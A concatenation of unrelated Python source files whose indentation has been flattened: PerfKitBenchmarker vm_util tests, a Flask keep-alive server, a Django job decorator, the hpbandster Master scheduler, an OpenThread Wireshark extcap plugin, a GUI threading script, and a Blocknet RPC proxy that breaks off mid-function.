# Copyright 2018 PerfKitBenchmarker Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for perfkitbenchmarker.vm_util."""
import os
import subprocess
import threading
import time
import unittest
import mock
from perfkitbenchmarker import errors
from perfkitbenchmarker import flags
from perfkitbenchmarker import vm_util
from tests import pkb_common_test_case
import psutil
FLAGS = flags.FLAGS
class ShouldRunOnInternalIpAddressTestCase(
pkb_common_test_case.PkbCommonTestCase):
def setUp(self):
super(ShouldRunOnInternalIpAddressTestCase, self).setUp()
self.sending_vm = mock.MagicMock()
self.receiving_vm = mock.MagicMock()
def _RunTest(self, expectation, ip_addresses, is_reachable=True):
FLAGS.ip_addresses = ip_addresses
self.sending_vm.IsReachable.return_value = is_reachable
self.assertEqual(
expectation,
vm_util.ShouldRunOnInternalIpAddress(
self.sending_vm, self.receiving_vm))
def testExternal_Reachable(self):
self._RunTest(False, vm_util.IpAddressSubset.EXTERNAL, True)
def testExternal_Unreachable(self):
self._RunTest(False, vm_util.IpAddressSubset.EXTERNAL, False)
def testInternal_Reachable(self):
self._RunTest(True, vm_util.IpAddressSubset.INTERNAL, True)
def testInternal_Unreachable(self):
self._RunTest(True, vm_util.IpAddressSubset.INTERNAL, False)
def testBoth_Reachable(self):
self._RunTest(True, vm_util.IpAddressSubset.BOTH, True)
def testBoth_Unreachable(self):
self._RunTest(True, vm_util.IpAddressSubset.BOTH, False)
def testReachable_Reachable(self):
self._RunTest(True, vm_util.IpAddressSubset.REACHABLE, True)
def testReachable_Unreachable(self):
self._RunTest(
False, vm_util.IpAddressSubset.REACHABLE, False)
def HaveSleepSubprocess():
"""Checks if the current process has a sleep subprocess."""
for child in psutil.Process(os.getpid()).children(recursive=True):
if 'sleep' in child.cmdline():
return True
return False
class WaitUntilSleepTimer(threading.Thread):
"""Timer that waits for a sleep subprocess to appear.
This is intended for specific tests that want to trigger timer
expiry as soon as it detects that a subprocess is executing a
"sleep" command.
It assumes that the test driver is not parallelizing the tests using
this method since that may lead to inconsistent results.
TODO(klausw): If that's an issue, could add a unique fractional part
to the sleep command args to distinguish them.
"""
def __init__(self, interval, function):
threading.Thread.__init__(self)
self.end_time = time.time() + interval
self.function = function
self.finished = threading.Event()
self.have_sleep = threading.Event()
def WaitForSleep():
while not self.finished.is_set():
if HaveSleepSubprocess():
self.have_sleep.set()
break
time.sleep(0) # yield to other Python threads
threading.Thread(target=WaitForSleep).run()
def cancel(self):
self.finished.set()
def run(self):
while time.time() < self.end_time and not self.have_sleep.is_set():
time.sleep(0) # yield to other Python threads
if not self.finished.is_set():
self.function()
self.finished.set()
class IssueCommandTestCase(pkb_common_test_case.PkbCommonTestCase):
def setUp(self):
super(IssueCommandTestCase, self).setUp()
FLAGS.time_commands = True
def testTimeoutNotReached(self):
_, _, retcode = vm_util.IssueCommand(['sleep', '0s'])
self.assertEqual(retcode, 0)
@mock.patch('threading.Timer', new=WaitUntilSleepTimer)
def testTimeoutReachedThrows(self):
with self.assertRaises(errors.VmUtil.IssueCommandTimeoutError):
_, _, _ = vm_util.IssueCommand(['sleep', '2s'], timeout=1,
raise_on_failure=False)
self.assertFalse(HaveSleepSubprocess())
@mock.patch('threading.Timer', new=WaitUntilSleepTimer)
def testTimeoutReached(self):
_, _, retcode = vm_util.IssueCommand(['sleep', '2s'], timeout=1,
raise_on_failure=False,
raise_on_timeout=False)
self.assertEqual(retcode, -9)
self.assertFalse(HaveSleepSubprocess())
def testNoTimeout(self):
_, _, retcode = vm_util.IssueCommand(['sleep', '0s'], timeout=None)
self.assertEqual(retcode, 0)
def testNoTimeout_ExceptionRaised(self):
with mock.patch('subprocess.Popen', spec=subprocess.Popen) as mock_popen:
mock_popen.return_value.wait.side_effect = KeyboardInterrupt()
with self.assertRaises(KeyboardInterrupt):
vm_util.IssueCommand(['sleep', '2s'], timeout=None)
self.assertFalse(HaveSleepSubprocess())
def testRaiseOnFailureSuppressed_NoException(self):
def _SuppressFailure(stdout, stderr, retcode):
del stdout # unused
del stderr # unused
self.assertNotEqual(
retcode, 0,
'_SuppressFailure should not have been called for retcode=0.')
return True
stdout, stderr, retcode = vm_util.IssueCommand(
['cat', 'non_existent_file'],
suppress_failure=_SuppressFailure)
# Ideally our command would produce stdout that we could verify is preserved
# but that's hard with the way IssueCommand creates local files for getting
# results subprocess.Popen().
self.assertEqual(stdout, '')
# suppressed from
# cat: non_existent_file: No such file or directory
self.assertEqual(stderr, '')
# suppressed from 1
self.assertEqual(retcode, 0)
def testRaiseOnFailureUnsuppressed_ExceptionRaised(self):
def _DoNotSuppressFailure(stdout, stderr, retcode):
del stdout # unused
del stderr # unused
self.assertNotEqual(
retcode, 0,
'_DoNotSuppressFailure should not have been called for retcode=0.')
return False
with self.assertRaises(errors.VmUtil.IssueCommandError) as cm:
vm_util.IssueCommand(['cat', 'non_existent_file'],
raise_on_failure=True,
suppress_failure=_DoNotSuppressFailure)
self.assertIn('cat: non_existent_file: No such file or directory',
str(cm.exception))
def testRaiseOnFailureWithNoSuppression_ExceptionRaised(self):
with self.assertRaises(errors.VmUtil.IssueCommandError) as cm:
vm_util.IssueCommand(['cat', 'non_existent_file'],
raise_on_failure=True,
suppress_failure=None)
self.assertIn('cat: non_existent_file: No such file or directory',
str(cm.exception))
if __name__ == '__main__':
unittest.main()
|
keep_alive.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return "Hello. I am alive!"
def run():
app.run(host='0.0.0.0',port=8080)
def keep_alive():
t = Thread(target=run)
t.start()
|
utils.py
|
import threading
from logging import Logger
from time import time
from typing import Callable
from django.core.management.base import BaseCommand
import metrics
def run_threaded(job_func: Callable[[], None], **kwargs):
job_thread = threading.Thread(target=job_func, kwargs=kwargs)
job_thread.start()
def job_logs_and_metrics(log: Logger):
def outer_wrapper(function):
def inner_wrapper(self: BaseCommand, *args, **kwargs):
task_name = log.name.split(".")[-1]
self.stdout.write(self.style.SUCCESS(f"starting task {task_name}"))
log.info(f"starting task {task_name}")
start = time()
try:
result = function(self, *args, **kwargs)
except Exception as error:
log.error(f"error in task {task_name}: {error}")
self.stdout.write(str(error))
self.stdout.write(self.style.ERROR(f"task {task_name} fail"))
metrics.ERRORS.labels(f"task_{task_name}").inc()
exit(1)
else:
metrics.CRONTASK.labels(task_name).inc()
success_msg = (
f"success task {task_name} - processed in {time() - start}s"
)
log.info(success_msg)
self.stdout.write(self.style.SUCCESS(success_msg))
return result
return inner_wrapper
return outer_wrapper
|
master.py
|
import os
import threading
import time
import math
import pdb
import copy
import logging
import numpy as np
from hpbandster.core.dispatcher import Dispatcher
from hpbandster.core.result import Result
from hpbandster.core.base_iteration import WarmStartIteration
class Master(object):
def __init__(
self,
run_id,
config_generator,
working_directory='.',
ping_interval=60,
nameserver='127.0.0.1',
nameserver_port=None,
host=None,
shutdown_workers=True,
job_queue_sizes=(-1, 0),
dynamic_queue_size=True,
logger=None,
result_logger=None,
previous_result=None,
):
"""The Master class is responsible for the book keeping and to decide what to run next. Optimizers are
instantiations of Master, that handle the important steps of deciding what configurations to run on what
budget when.
Parameters
----------
run_id : string
A unique identifier of that Hyperband run. Use, for example, the cluster's JobID when running multiple
concurrent runs to separate them
config_generator: hpbandster.config_generators object
An object that can generate new configurations and registers results of executed runs
working_directory: string
The top level working directory accessible to all compute nodes(shared filesystem).
eta : float
In each iteration, a complete run of sequential halving is executed. In it,
after evaluating each configuration on the same subset size, only a fraction of
1/eta of them 'advances' to the next round.
Must be greater or equal to 2.
min_budget : float
The smallest budget to consider. Needs to be positive!
max_budget : float
the largest budget to consider. Needs to be larger than min_budget!
The budgets will be geometrically distributed :math:`\sim \eta^k` for
:math:`k\in [0, 1, ... , num\_subsets - 1]`.
ping_interval: int
number of seconds between pings to discover new nodes. Default is 60 seconds.
nameserver: str
address of the Pyro4 nameserver
nameserver_port: int
port of Pyro4 nameserver
host: str
ip (or name that resolves to that) of the network interface to use
shutdown_workers: bool
flag to control whether the workers are shutdown after the computation is done
job_queue_size: tuple of ints
min and max size of the job queue. During the run, when the number of jobs in the queue
reaches the min value, it will be filled up to the max size. Default: (0,1)
dynamic_queue_size: bool
Whether or not to change the queue size based on the number of workers available.
If true (default), the job_queue_sizes are relative to the current number of workers.
logger: logging.logger like object
the logger to output some (more or less meaningful) information
result_logger: hpbandster.api.results.util.json_result_logger object
a result logger that writes live results to disk
previous_result: hpbandster.core.result.Result object
previous run to warmstart the run
"""
self.working_directory = working_directory
os.makedirs(self.working_directory, exist_ok=True)
if logger is None:
self.logger = logging.getLogger('hpbandster')
else:
self.logger = logger
self.result_logger = result_logger
self.config_generator = config_generator
self.time_ref = None
self.iterations = []
self.jobs = []
self.num_running_jobs = 0
self.job_queue_sizes = job_queue_sizes
self.user_job_queue_sizes = job_queue_sizes
self.dynamic_queue_size = dynamic_queue_size
if job_queue_sizes[0] >= job_queue_sizes[1]:
raise ValueError("The queue size range needs to be (min, max) with min<max!")
if previous_result is None:
self.warmstart_iteration = []
else:
self.warmstart_iteration = [WarmStartIteration(previous_result, self.config_generator)]
# condition to synchronize the job_callback and the queue
self.thread_cond = threading.Condition()
self.config = {'time_ref': self.time_ref}
self.dispatcher = Dispatcher(self.job_callback,
queue_callback=self.adjust_queue_size,
run_id=run_id,
ping_interval=ping_interval,
nameserver=nameserver,
nameserver_port=nameserver_port,
host=host)
self.dispatcher_thread = threading.Thread(target=self.dispatcher.run)
self.dispatcher_thread.start()
def shutdown(self, shutdown_workers=False):
self.logger.debug('HBMASTER: shutdown initiated, shutdown_workers = %s' %
(str(shutdown_workers)))
self.dispatcher.shutdown(shutdown_workers)
self.dispatcher_thread.join()
def wait_for_workers(self, min_n_workers=1):
"""
helper function to hold execution until some workers are active
Parameters
----------
min_n_workers: int
minimum number of workers present before the run starts
"""
self.logger.debug('wait_for_workers trying to get the condition')
with self.thread_cond:
while (self.dispatcher.number_of_workers() < min_n_workers):
self.logger.debug(
'HBMASTER: only %i worker(s) available, waiting for at least %i.' %
(self.dispatcher.number_of_workers(), min_n_workers))
self.thread_cond.wait(1)
self.dispatcher.trigger_discover_worker()
self.logger.debug('Enough workers to start this run!')
def get_next_iteration(self, iteration, iteration_kwargs):
"""
instantiates the next iteration
Overwrite this to change the iterations for different optimizers
Parameters
----------
iteration: int
the index of the iteration to be instantiated
iteration_kwargs: dict
additional kwargs for the iteration class
Returns
-------
HB_iteration: a valid HB iteration object
"""
raise NotImplementedError('implement get_next_iteration for %s' % (type(self).__name__))
def run(
self,
n_iterations=1,
min_n_workers=1,
iteration_kwargs={},
):
"""
run n_iterations of SuccessiveHalving
Parameters
----------
n_iterations: int
number of iterations to be performed in this run
min_n_workers: int
minimum number of workers before starting the run
"""
self.wait_for_workers(min_n_workers)
iteration_kwargs.update({'result_logger': self.result_logger})
if self.time_ref is None:
self.time_ref = time.time()
self.config['time_ref'] = self.time_ref
self.logger.info('HBMASTER: starting run at %s' % (str(self.time_ref)))
self.thread_cond.acquire()
while True:
self._queue_wait()
next_run = None
# find a new run to schedule
for i in self.active_iterations():
next_run = self.iterations[i].get_next_run()
if not next_run is None: break
if not next_run is None:
self.logger.debug('HBMASTER: schedule new run for iteration %i' % i)
self._submit_job(*next_run)
continue
else:
if n_iterations > 0: #we might be able to start the next iteration
self.iterations.append(
self.get_next_iteration(len(self.iterations), iteration_kwargs))
n_iterations -= 1
continue
# at this point there is no imediate run that can be scheduled,
# so wait for some job to finish if there are active iterations
if self.active_iterations():
self.thread_cond.wait()
else:
break
self.thread_cond.release()
for i in self.warmstart_iteration:
i.fix_timestamps(self.time_ref)
ws_data = [i.data for i in self.warmstart_iteration]
return Result([copy.deepcopy(i.data) for i in self.iterations] + ws_data, self.config)
def adjust_queue_size(self, number_of_workers=None):
self.logger.debug('HBMASTER: number of workers changed to %s' % str(number_of_workers))
with self.thread_cond:
self.logger.debug('adjust_queue_size: lock accquired')
if self.dynamic_queue_size:
nw = self.dispatcher.number_of_workers(
) if number_of_workers is None else number_of_workers
self.job_queue_sizes = (self.user_job_queue_sizes[0] + nw,
self.user_job_queue_sizes[1] + nw)
self.logger.info('HBMASTER: adjusted queue size to %s' % str(self.job_queue_sizes))
self.thread_cond.notify_all()
def job_callback(self, job):
"""
method to be called when a job has finished
this will do some book keeping and call the user defined
new_result_callback if one was specified
"""
self.logger.debug('job_callback for %s started' % str(job.id))
with self.thread_cond:
self.logger.debug('job_callback for %s got condition' % str(job.id))
self.num_running_jobs -= 1
if not self.result_logger is None:
self.result_logger(job)
self.iterations[job.id[0]].register_result(job)
self.config_generator.new_result(job)
if self.num_running_jobs <= self.job_queue_sizes[0]:
self.logger.debug("HBMASTER: Trying to run another job!")
self.thread_cond.notify()
self.logger.debug('job_callback for %s finished' % str(job.id))
def _queue_wait(self):
"""
helper function to wait for the queue to not overflow/underload it
"""
if self.num_running_jobs >= self.job_queue_sizes[1]:
while (self.num_running_jobs > self.job_queue_sizes[0]):
self.logger.debug('HBMASTER: running jobs: %i, queue sizes: %s -> wait' %
(self.num_running_jobs, str(self.job_queue_sizes)))
self.thread_cond.wait()
def _submit_job(self, config_id, config, budget):
"""
hidden function to submit a new job to the dispatcher
This function handles the actual submission in a
(hopefully) thread save way
"""
self.logger.debug('HBMASTER: trying submitting job %s to dispatcher' % str(config_id))
with self.thread_cond:
self.logger.debug('HBMASTER: submitting job %s to dispatcher' % str(config_id))
self.dispatcher.submit_job(config_id,
config=config,
budget=budget,
working_directory=self.working_directory)
self.num_running_jobs += 1
#shouldn't the next line be executed while holding the condition?
self.logger.debug("HBMASTER: job %s submitted to dispatcher" % str(config_id))
def active_iterations(self):
"""
function to find active (not marked as finished) iterations
Returns
-------
list: all active iteration objects (empty if there are none)
"""
l = list(
filter(lambda idx: not self.iterations[idx].is_finished, range(len(self.iterations))))
return (l)
def __del__(self):
pass
|
extcap_ot.py
|
#!/usr/bin/env python3
#
# Copyright (c) 2019, The OpenThread Authors.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
import tempfile
import argparse
import subprocess
import threading
import logging
import re
from spinel.stream import StreamOpen
from spinel.const import SPINEL
from spinel.codec import WpanApi
from serial.tools.list_ports import comports
from enum import Enum
# Nodeid is required to execute ot-ncp-ftd for its sim radio socket port.
# This is maximum that works for MacOS.
DEFAULT_NODEID = 34
COMMON_BAUDRATE = [460800, 115200, 9600]
class Config(Enum):
CHANNEL = 0
BAUDRATE = 1
TAP = 2
class _StreamCloser:
def __init__(self, stream):
self._stream = stream
def __enter__(self):
return self._stream
def __exit__(self, exc_type, exc_val, exc_tb):
self._stream.close()
def extcap_config(interface, option, extcap_version):
"""List Configuration for the given interface"""
args = []
values = []
args.append((Config.CHANNEL.value, '--channel', 'Channel', 'IEEE 802.15.4 channel', 'selector', '{required=true}{default=11}'))
match = re.match(r'^(\d+)(\.\d+)*$', extcap_version)
if match and int(match.group(1)) >= 3:
args.append((Config.TAP.value, '--tap', 'IEEE 802.15.4 TAP (only for Wireshark3.0 and later)', 'IEEE 802.15.4 TAP', 'boolflag', '{default=yes}'))
for arg in args:
print('arg {number=%d}{call=%s}{display=%s}{tooltip=%s}{type=%s}%s' % arg)
values = values + [(Config.CHANNEL.value, '%d' % i, '%d' % i, 'true' if i == 11 else 'false') for i in range(11, 27)]
for value in values:
print('value {arg=%d}{value=%s}{display=%s}{default=%s}' % value)
def extcap_dlts(interface):
"""List DLTs for the given interface"""
print('dlt {number=195}{name=IEEE802_15_4_WITHFCS}{display=IEEE 802.15.4 with FCS}')
print('dlt {number=283}{name=IEEE802_15_4_TAP}{display=IEEE 802.15.4 TAP}')
def serialopen(interface, log_file):
"""
Open serial to indentify OpenThread sniffer
:param interface: string, eg: '/dev/ttyUSB0 - Zolertia Firefly platform', '/dev/ttyACM1 - nRF52840 OpenThread Device'
"""
sys.stdout = log_file
sys.stderr = log_file
interface = str(interface).split()[0]
baudrate = None
for speed in COMMON_BAUDRATE:
with _StreamCloser(StreamOpen('u', interface, False, baudrate=speed)) as stream, \
WpanApi(stream, nodeid=DEFAULT_NODEID, timeout=0.1) as wpan_api:
# result should not be None for both NCP and RCP
result = wpan_api.prop_get_value(SPINEL.PROP_CAPS) # confirm OpenThread Sniffer
# check whether or not is OpenThread Sniffer
if result is not None:
baudrate = speed
break
if baudrate is not None:
if sys.platform == 'win32':
# Wireshark only shows the value of key `display`('OpenThread Sniffer').
# Here intentionally appends interface in the end (e.g. 'OpenThread Sniffer: COM0').
print('interface {value=%s:%s}{display=OpenThread Sniffer %s}' % (interface, baudrate, interface), file=sys.__stdout__, flush=True)
else:
# On Linux or MacOS, wireshark will show the concatenation of the content of `display`
# and `interface` by default (e.g. 'OpenThread Sniffer: /dev/ttyACM0').
print('interface {value=%s:%s}{display=OpenThread Sniffer}' % (interface, baudrate), file=sys.__stdout__, flush=True)
def extcap_interfaces():
"""List available interfaces to capture from"""
log_file = open(os.path.join(tempfile.gettempdir(), 'extcap_ot_interfaces.log'), 'w')
print('extcap {version=1.0.0}{display=OpenThread Sniffer}{help=https://github.com/openthread/pyspinel}')
threads = []
for interface in comports():
th = threading.Thread(target=serialopen, args=(interface, log_file))
threads.append(th)
th.start()
for th in threads:
th.join()
def extcap_capture(interface, fifo, control_in, control_out, channel, tap):
"""Start the sniffer to capture packets"""
# baudrate = detect_baudrate(interface)
interface_port = str(interface).split(':')[0]
interface_baudrate = str(interface).split(':')[1]
with _StreamCloser(StreamOpen('u', interface_port, False, baudrate=int(interface_baudrate))) as stream, \
WpanApi(stream, nodeid=DEFAULT_NODEID) as wpan_api:
wpan_api.prop_set_value(SPINEL.PROP_PHY_ENABLED, 1)
if sys.platform == 'win32':
python_path = subprocess.Popen(
'py -3 -c "import sys; print(sys.executable)"',
stdout=subprocess.PIPE,
shell=True,
).stdout.readline().decode().strip()
sniffer_py = os.path.join(os.path.dirname(python_path), 'Scripts', 'sniffer.py')
cmd = ['python', sniffer_py]
else:
cmd = ['sniffer.py']
cmd += ['-c', channel, '-u', interface_port, '--crc', '--rssi', '-b', interface_baudrate, '-o', str(fifo),
'--is-fifo', '--use-host-timestamp']
if tap:
cmd.append('--tap')
subprocess.Popen(cmd).wait()
def extcap_close_fifo(fifo):
""""Close extcap fifo"""
# This is apparently needed to workaround an issue on Windows/macOS
# where the message cannot be read. (really?)
fh = open(fifo, 'wb', 0)
fh.close()
if __name__ == '__main__':
# Capture options
parser = argparse.ArgumentParser(description='OpenThread Sniffer extcap plugin')
# Extcap Arguments
parser.add_argument('--extcap-interfaces', help='Provide a list of interfaces to capture from', action='store_true')
parser.add_argument('--extcap-interface', help='Provide the interface to capture from')
parser.add_argument('--extcap-dlts', help='Provide a list of dlts for the given interface', action='store_true')
parser.add_argument('--extcap-config', help='Provide a list of configurations for the given interface', action='store_true')
parser.add_argument('--extcap-reload-option', help='Reload elements for the given option')
parser.add_argument('--capture', help='Start the capture routine', action='store_true')
parser.add_argument('--fifo', help='Use together with capture to provide the fifo to dump data to')
parser.add_argument('--extcap-capture-filter', help='Used together with capture to provide a capture filter')
parser.add_argument('--extcap-control-in', help='Used to get control messages from toolbar')
parser.add_argument('--extcap-control-out', help='Used to send control messages to toolbar')
parser.add_argument('--extcap-version', help='Wireshark Version')
# Interface Arguments
parser.add_argument('--channel', help='IEEE 802.15.4 capture channel [11-26]')
parser.add_argument('--tap', help='IEEE 802.15.4 TAP (only for Wireshark3.0 and later)', action='store_true')
try:
args, unknown = parser.parse_known_args()
except argparse.ArgumentError as e:
parser.exit('ERROR_ARG: %s' % str(e))
extcap_version = ''
version_path = os.path.join(tempfile.gettempdir(), 'extcap_ot_version')
if args.extcap_version:
extcap_version = args.extcap_version
with open(version_path, mode='w') as f:
f.write(extcap_version)
else:
try:
with open(version_path, mode='r') as f:
extcap_version = f.read()
except FileNotFoundError:
pass
if len(unknown) > 0:
parser.exit('Sniffer %d unknown arguments given: %s' % (len(unknown), unknown))
if len(sys.argv) == 0:
parser.print_help()
parser.exit('No arguments given!')
if not args.extcap_interfaces and args.extcap_interface is None:
parser.exit('An interface must be provided or the selection must be displayed')
if args.extcap_interfaces:
extcap_interfaces()
sys.exit(0)
if args.extcap_config:
extcap_config(args.extcap_interface, '', extcap_version)
elif args.extcap_dlts:
extcap_dlts(args.extcap_interface)
elif args.capture:
if args.fifo is None:
parser.exit('The fifo must be provided to capture')
try:
extcap_capture(args.extcap_interface, args.fifo, args.extcap_control_in, args.extcap_control_out, args.channel, args.tap)
except KeyboardInterrupt:
pass
except Exception as e:
logging.exception(e)
parser.exit('ERROR_INTERNAL')
else:
parser.print_help()
parser.exit('ERROR_USAGE')
|
test_GUI_threading.py
|
from MultiVehicleEnv.GUI import GUI
import argparse
import time
import threading
parser = argparse.ArgumentParser(description="GUI for Multi-VehicleEnv")
parser.add_argument('--gui-port',type=str,default='/dev/shm/gui_port')
parser.add_argument('--fps',type=int,default=24)
args = parser.parse_args()
GUI_instance = GUI(port_type = 'file',gui_port = '/dev/shm/gui_port' , fps = 24)
GUI_t = threading.Thread(target=GUI_instance._render_target())
GUI_t.setDaemon(True)
GUI_t.start()
GUI_t.join()
|
xrproxy.py
|
# Copyright (c) 2019-2020 The Blocknet developers
# Distributed under the MIT software license, see the accompanying
# file LICENSE or http://www.opensource.org/licenses/mit-license.php.
#!/usr/bin/env python3
import bitcoin.core
import bitcoin.signmessage
import bitcoin.wallet
import json
import requests
import threading
import uwsgi
from requests.auth import HTTPDigestAuth
# import pydevd_pycharm
# pydevd_pycharm.settrace('localhost', port=4444, stdoutToServer=True, stderrToServer=True)
def application(env: dict, start_response):
# Select chain
chain = uwsgi.opt.get('BLOCKNET_CHAIN', b'mainnet').decode('utf8').strip()
try:
bitcoin.SelectParams(chain)
except ValueError as e:
print('Failed to parse BLOCKNET_CHAIN parameter, defaulting to mainnet: ' + getattr(e, 'message', repr(e)))
bitcoin.SelectParams('mainnet')
snodekey = bitcoin.wallet.CKey
# check snode key
snodekey_raw = uwsgi.opt.get('SERVICENODE_PRIVKEY', b'').decode('utf8').strip()
if not snodekey_raw:
return send_response({
'code': 1002,
'error': 'Internal Server Error: bad service node key'
}, snodekey, start_response)
try:
snodekey = bitcoin.wallet.CBitcoinSecret(snodekey_raw)
except bitcoin.wallet.CBitcoinSecretError as e:
print(getattr(e, 'message', repr(e)))
return send_response({
'code': 1002,
'error': 'Internal Server Error: bad service node key'
}, snodekey, start_response)
# parse the request path
request_path = str(env.get('PATH_INFO'))
paths = request_path.split('/')
if len(paths) > 1:
del paths[0]
if len(paths) < 2:
return send_response({
'code': 1004,
'error': 'Bad request path ' + request_path + ' , The path must be in the format '
'/xr/BLOCK/xrGetBlockCount'
}, snodekey, start_response)
elif len(paths) > 3:
return send_response({
'code': 1004,
'error': 'Bad request path ' + request_path + ' , The path must have a namespace, a method, '
'and a token, for example: /xr/BLOCK/xrGetBlockCount'
}, snodekey, start_response)
namesp = paths[0]
token = ''
xrfunc = ''
if namesp == 'xr':
token = paths[1]
xrfunc = paths[2]
elif namesp == 'xrs':
xrfunc = paths[1]
if not namesp or not xrfunc or (namesp == 'xr' and not token):
return send_response({
'code': 1004,
'error': 'Bad request path ' + request_path + ' , The path must have a namespace, a method, '
'and a token, for example: /xr/BLOCK/xrGetBlockCount'
}, snodekey, start_response)
# if xrouter plugin, set token to xr func name
if namesp == 'xrs':
token = xrfunc
# if payment tx exists, process it in background
payment_tx = str(env.get('HTTP_XR_PAYMENT', ''))
should_handle = uwsgi.opt.get('HANDLE_PAYMENTS', b'true').decode('utf8').lower()
if should_handle == 'true' or should_handle == '1':
payment_enforcement = uwsgi.opt.get('HANDLE_PAYMENTS_ENFORCE', b'false').decode('utf8').lower()
if payment_enforcement == 'true' or payment_enforcement == '1':
if payment_tx == '' or not handle_payment(payment_tx, env):
return send_response({
'code': 1028,
'error': 'Bad request: bad or insufficient fee for ' + xrfunc + ' for token ' + token
}, snodekey, start_response)
else:
hp_thread = threading.Thread(target=handle_payment, args=(payment_tx, env))
hp_thread.start()
try:
response = call_xrfunc(namesp, token, xrfunc, env)
return send_response(response, snodekey, start_response)
except ValueError as e:
return send_response({
'code': 1002,
'error': 'Internal Server Error: failed to call method ' + xrfunc + ' for token ' + token
+ ' : ' + getattr(e, 'message', repr(e))
}, snodekey, start_response)
except:
return send_response({
'code': 1002,
'error': 'Internal Server Error: failed to call method ' + xrfunc + ' for token ' + token
}, snodekey, start_response)
def call_xrfunc(namesp: str, token: str, xrfunc: str, env: dict):
is_xrouter_plugin = namesp == 'xrs'
# obtain host info
rpchost = uwsgi.opt.get('RPC_' + token + '_HOSTIP', b'').decode('utf8')
rpcport = uwsgi.opt.get('RPC_' + token + '_PORT', b'').decode('utf8')
rpcuser = uwsgi.opt.get('RPC_' + token + '_USER', b'').decode('utf8')
rpcpass = uwsgi.opt.get('RPC_' + token + '_PASS', b'').decode('utf8')
rpcver = uwsgi.opt.get('RPC_' + token + '_VER', b'1.0').decode('utf8')
rpcmethod = ''
try:
request_body_size = int(env.get('CONTENT_LENGTH', 0))
except ValueError:
request_body_size = 0
params = []
if request_body_size > 0:
request_body = env.get('wsgi.input').read(request_body_size)
if request_body != b'\n':
try:
data = request_body.decode('utf8')
params += json.loads(data)
except:
pass
if is_xrouter_plugin:
if 'RPC_' + token + '_METHOD' in uwsgi.opt:
rpcmethod = uwsgi.opt.get('RPC_' + token + '_METHOD', b'').decode('utf8')
elif 'URL_' + token + '_HOSTIP' in uwsgi.opt:
return call_url(xrfunc, params, env)
if not rpchost or not rpcport or not rpcuser or not rpcpass or (is_xrouter_plugin and not rpcmethod):
return {
'code': 1002,
'error': 'Internal Server Error: bad proxy configuration for token ' + token
}
# resolve the rpc name from the supplied xrouter call
rpc_method = rpcmethod.lower() if is_xrouter_plugin else xr_to_rpc(token, xrfunc)
if not rpc_method:
return {
'code': 1031,
'error': 'Unsupported call ' + xrfunc + ' for token ' + token
}
rpcurl = 'http://' + rpcuser + ':' + rpcpass + '@' + rpchost + ':' + rpcport
if rpcuser == '' and rpcpass == '': # if no rpc credentials
rpcurl = 'http://' + rpchost + ':' + rpcport
headers = {'Content-Type': 'application/json'}
l_xr_method = xrfunc.lower()
l_token = token.lower()
if l_token == 'eth' or l_token == 'etc':
if l_xr_method == 'xrdecoderawtransaction':
pass
if l_xr_method == 'xrgetblockcount':
payload = json.dumps({
'id': 1,
'method': rpc_method,
'params': params,
'jsonrpc': rpcver
})
try:
res = requests.post(rpcurl, headers=headers, data=payload)
try:
response = parse_result(json.loads(res.content))
count = int(response, 16)
return count
except ValueError:
return res.content.decode('utf8') # return raw string if json decode fails
except:
return {
'code': 1002,
'error': 'Internal Server Error: failed to connect to ' + xrfunc + ' for token ' + token
}
if l_xr_method == 'xrgetblockhash':
if isinstance(params[0], int):
params = [hex(params[0]), False]
elif isinstance(params[0], str) and not params[0].startswith('0x'):
try: # first check if int
i = int(params[0])
params = [hex(i), False]
except ValueError:
params = ['0x' + params[0], False]
else:
params = [params[0], False]
payload = json.dumps({
'id': 1,
'method': rpc_method,
'params': params,
'jsonrpc': rpcver
})
try:
res = requests.post(rpcurl, headers=headers, data=payload)
try:
response = json.loads(res.content)
block_hash = str(response['result']['hash'])
return block_hash
except ValueError:
return res.content.decode('utf8') # return raw string if json decode fails
except:
return {
'code': 1002,
'error': 'Internal Server Error: failed to connect to ' + xrfunc + ' for token ' + token
}
if l_xr_method == 'xrgetblock':
params = [params[0], False]
if l_xr_method == 'xrgetblocks' or l_xr_method == 'xrgettransactions': # iterate over all ids
response = []
for b_id in params:
parsed_id: any
rpc_method2 = rpc_method
if isinstance(b_id, int):
parsed_id = hex(b_id)
if l_xr_method == 'xrgetblocks':
rpc_method2 = 'eth_getBlockByNumber'
else:
parsed_id = b_id
params2 = [parsed_id, False]
if l_xr_method == 'xrgettransactions':
params2 = [parsed_id] # transactions doesn't support 2nd parameter
payload = json.dumps({
'id': 1,
'method': rpc_method2,
'params': params2,
'jsonrpc': rpcver
})
try:
res = requests.post(rpcurl, headers=headers, data=payload)
response += [parse_result(json.loads(res.content))]
except:
return {
'code': 1002,
'error': 'Internal Server Error: failed to connect to ' + xrfunc + ' for token ' + token
}
return response
if l_xr_method == 'xrgettransaction':
pass
if l_xr_method == 'xrsendtransaction':
pass
elif l_token == 'neo':
if l_xr_method == 'xrdecoderawtransaction':
pass
if l_xr_method == 'xrgetblockcount':
pass
if l_xr_method == 'xrgetblockhash':
params[0] = int(params[0])
if l_xr_method == 'xrgetblock':
params = [params[0], 1]
if l_xr_method == 'xrgetblocks' or l_xr_method == 'xrgettransactions': # iterate over all ids
response = []
for b_id in params:
params2 = [b_id]
if l_xr_method == 'xrgettransactions' or l_xr_method == 'xrgetblocks':
params2 += [1]
payload = json.dumps({
'id': 1,
'method': rpc_method,
'params': params2,
'jsonrpc': rpcver
})
try:
res = requests.post(rpcurl, headers=headers, data=payload)
response += [parse_result(json.loads(res.content))]
except:
return {
'code': 1002,
'error': 'Internal Server Error: failed to connect to ' + xrfunc + ' for token ' + token
}
return response
if l_xr_method == 'xrgettransaction':
